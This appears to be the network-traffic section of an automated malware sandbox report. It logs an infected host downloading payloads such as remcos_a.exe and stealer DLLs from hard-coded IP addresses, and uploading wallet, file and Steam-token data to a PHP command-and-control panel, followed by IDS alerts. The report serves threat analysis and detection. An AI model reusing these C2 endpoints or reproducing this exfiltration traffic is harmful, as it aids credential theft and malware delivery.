2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 2d 2d 0d 0a Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="file"------IDBGHDGHCGHCAAKFIIEC--
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 2d 2d 0d 0a Data Ascii: ------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="message"wallets------CBAFCAKEHDHDHIDHDGDH--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="message"files------DBKKFHIEGDHJKECAAKKE--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="file"------FBKEHJEGCFBFHJJKJEHD--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"ybncbhylepme------DBKKKEHDHCBFIEBFBGID--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KEGDAKEHJDHIDHJJDAEC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/remcos_a.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 34 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004494001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/buildd.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004506001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=NzYwNjM5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 147.124.221.201:8080Content-Length: 145961Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004516001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004517001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 07 Nov 2024 02:49:06 GMTIf-None-Match: "672c2aa2-210400"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="build"tale------IEHDBGDHDAECBGDHJKFI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 31 38 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004518031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004519001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"tale------JKKFIIEBKEGIEBFIJKFI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build"tale------IJJKKJJDAAAAAKFHJJDG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="build"tale------FCAEBFIJKEBGHIDHIEGI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 104.21.5.155 104.21.5.155

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49755 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49762 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49821 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49851 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49880 -> 185.215.113.16:80
